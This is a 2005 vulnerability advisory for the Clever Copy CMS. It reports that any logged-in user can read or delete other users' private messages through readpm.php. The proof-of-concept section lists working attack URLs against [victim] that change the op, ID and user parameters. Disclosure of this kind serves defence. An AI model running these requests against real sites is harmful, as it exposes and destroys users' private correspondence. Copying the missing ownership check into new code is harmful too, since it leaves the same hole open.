################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
################################################


Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a Unauthorized read & delete
Private Messages from other users.

The flaw is done wen a authenticated user try to access directly to a
especial url
to gain unauthorized access to private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time !!

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005

###################
proof of concept
###################

First we must be logged for access to private messages and 

go to this url :

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we look the message 2 from waltrapass user :)

op= read or del
id= id from message what we like to look
name= username of user was send the private message ( this is not
necessary to view or delete a message)
user= username from user what we try to look their PM

for delete a message we can go to similar url:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass

##################### €nd #############################

thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....